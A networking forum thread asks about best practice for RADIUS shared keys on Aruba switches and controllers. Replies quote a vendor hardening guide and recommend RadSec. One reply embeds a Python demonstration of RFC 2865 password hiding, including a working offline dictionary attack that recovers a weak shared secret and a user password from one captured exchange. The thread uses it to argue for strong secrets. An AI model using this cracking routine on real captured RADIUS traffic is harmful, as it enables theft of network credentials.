Security

  • 1.  RADIUS Keys - best practices

    Posted May 16, 2024 10:51 AM

    Hi, in the past I've always ensured that every switch/mobility controller has a uniquely generated shared key. I know that we can define our use of shared keys either unique to a device or, for example, have the same shared key across a given IP address scope e.g. 192/10

    So does Aruba have a recommended best practice for RADIUS shared key assignment ... or is it just a case of "you can do these things ... take your pick..."

    Rgds

    Alex



  • 2.  RE: RADIUS Keys - best practices

    Posted May 16, 2024 12:12 PM

    From the hardening guide here: https://support.hpe.com/hpesc/public/docDisplay?docId=a00107216en_us

    "RADIUS secrets
    The RADIUS protocol provides a weak form of encryption, which uses the RADIUS shared secret as the basis for the
    encryption key. Ensure that the RADIUS shared secret is as long and as complex as possible. ArubaOS supports a
    maximum length of 63 characters. There is no need for this secret to be memorable by a human, so use a service
    such as http://www.random.org/ to generate a truly random string.
    An authentication server performing authentication for WPA2 sessions will use the RADIUS protocol to send the
    WPA2 Pairwise Master Key (PMK) to an Aruba mobility controller; an attacker intercepting this key would also be
    able to monitor and decrypt Wi-Fi traffic over the air. If the link between the RADIUS server and the Aruba device is
    trusted (e.g., within the same datacenter) then relying on RADIUS encryption is sufficient. However, if the path
    traverses untrusted segments, such as WAN links, RADIUS traffic should be secured inside IPsec tunnels."



    ------------------------------
    Any opinions expressed here are solely my own and not necessarily that of Hewlett Packard Enterprise or Aruba Networks.

    HPE Design and Deploy Guides: https://community.arubanetworks.com/support/migrated-knowledge-base?attachments=&communitykey=dcc83c62-1a3a-4dd8-94dc-92968ea6fff1&pageindex=0&pagesize=12&search=&sort=most_recent&viewtype=card
    ------------------------------
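    The "weak form of encryption" the hardening guide refers to is the RFC 2865 construction: the User-Password attribute is hidden by XORing it with MD5(secret || Request Authenticator), and the Response Authenticator is MD5 over the reply plus the secret. Anyone who captures one Access-Request/Access-Accept pair can therefore test candidate secrets offline at MD5 speed, and a recovered secret unhides every password sent with it. The following Python is an added example written for this thread, not code from the hardening guide or from Aruba; the exchange, the wordlist and the alphabet used by `generate_shared_secret` are constructed assumptions. It builds a request/response pair, runs the dictionary attack against a weak secret, then shows the same attack failing against a 63-character random secret.

```python
"""RFC 2865 RADIUS shared-secret handling: User-Password hiding, Response
Authenticator, an offline dictionary attack against a weak secret, and a
CSPRNG generator for a 63-character secret (the ArubaOS maximum)."""
import hashlib
import os
import secrets
import string
import struct
from typing import Optional

ACCESS_REQUEST, ACCESS_ACCEPT = 1, 2
USER_NAME, USER_PASSWORD = 1, 2

# Constructed wordlist standing in for what an attacker would really use.
WORDLIST = [b"radius", b"aruba123", b"secret", b"password1"]


def attribute(attr_type: int, value: bytes) -> bytes:
    """Type-Length-Value encoding of one attribute; Length includes the 2-byte header."""
    return struct.pack("!BB", attr_type, 2 + len(value)) + value


def parse_attributes(attrs: bytes) -> dict:
    """Walk the TLV list and return {type: value}."""
    out, i = {}, 0
    while i < len(attrs):
        attr_type, length = attrs[i], attrs[i + 1]
        out[attr_type] = attrs[i + 2:i + length]
        i += length
    return out


def hide_user_password(password: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """RFC 2865 5.2: pad to 16-byte blocks, XOR each block with MD5(secret || previous
    ciphertext block); for the first block 'previous' is the Request Authenticator."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", request_auth
    for i in range(0, len(padded), 16):
        mask = hashlib.md5(secret + prev).digest()
        prev = bytes(p ^ m for p, m in zip(padded[i:i + 16], mask))
        out += prev
    return out


def reveal_user_password(hidden: bytes, secret: bytes, request_auth: bytes) -> bytes:
    """Inverse of hide_user_password: regenerate the keystream, strip the NUL padding."""
    out, prev = b"", request_auth
    for i in range(0, len(hidden), 16):
        mask = hashlib.md5(secret + prev).digest()
        out += bytes(c ^ m for c, m in zip(hidden[i:i + 16], mask))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")


def build_access_request(identifier: int, request_auth: bytes, attrs: bytes) -> bytes:
    """Code | Identifier | Length | Request Authenticator (16 random bytes) | attributes."""
    return struct.pack("!BBH", ACCESS_REQUEST, identifier, 20 + len(attrs)) + request_auth + attrs


def build_response(code: int, identifier: int, request_auth: bytes, attrs: bytes, secret: bytes) -> bytes:
    """Response Authenticator = MD5(Code|ID|Length|RequestAuth|Attributes|Secret) (RFC 2865 3)."""
    header = struct.pack("!BBH", code, identifier, 20 + len(attrs))
    resp_auth = hashlib.md5(header + request_auth + attrs + secret).digest()
    return header + resp_auth + attrs


def recover_secret(request: bytes, response: bytes, candidates) -> Optional[bytes]:
    """Offline dictionary attack: a captured request/response pair lets an observer test
    candidate secrets by recomputing the Response Authenticator, with no interaction
    with the NAS or the server, so only the secret's entropy limits the attack."""
    request_auth = request[4:20]
    length = struct.unpack("!H", response[2:4])[0]
    resp_auth, attrs = response[4:20], response[20:length]
    for cand in candidates:
        if hashlib.md5(response[:4] + request_auth + attrs + cand).digest() == resp_auth:
            return cand
    return None


def generate_shared_secret(length: int = 63) -> str:
    """CSPRNG secret. Alphabet is an assumption: printable ASCII minus space, quotes and
    backslash so it pastes cleanly into a CLI; adjust to what your platform accepts."""
    alphabet = string.ascii_letters + string.digits + "!#$%&()*+,-./:;<=>?@[]^_{|}~"
    return "".join(secrets.choice(alphabet) for _ in range(length))


def demo(secret: bytes, wordlist) -> dict:
    """Constructed exchange: NAS sends User-Name/User-Password, server replies Access-Accept,
    an eavesdropper attacks the capture. Returns what the eavesdropper learned."""
    request_auth = os.urandom(16)
    attrs = attribute(USER_NAME, b"alex") + attribute(
        USER_PASSWORD, hide_user_password(b"Wi-Fi-Passw0rd!", secret, request_auth))
    request = build_access_request(7, request_auth, attrs)
    response = build_response(ACCESS_ACCEPT, 7, request_auth, b"", secret)
    found = recover_secret(request, response, wordlist)
    password = None
    if found is not None:
        password = reveal_user_password(parse_attributes(request[20:])[USER_PASSWORD], found, request_auth)
    return {"secret": found, "password": password}


if __name__ == "__main__":
    print("weak secret  :", demo(b"aruba123", WORDLIST))
    print("strong secret:", demo(generate_shared_secret().encode(), WORDLIST))
```

    The weak run recovers both the secret and the user's password from a single captured exchange; the strong run returns nothing for the same capture. Note that a long secret only raises the cost of guessing; it does not change the fact that MD5-based hiding is the only protection on the wire, which is why the guide tells you to put RADIUS inside IPsec across untrusted links.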



  • 3.  RE: RADIUS Keys - best practices

    Posted May 16, 2024 12:16 PM

    I've seen people go with one global key and I've seen people go with individual keys based on unique device/device type/geography/whim/etc.  Best practice for security is to move to RadSec where the key is no longer the most susceptible portion of the communication.  Short of RadSec, maintain a policy that meets the needs that you feel are important.



    ------------------------------
    Carson Hulcher, ACEX#110
    ------------------------------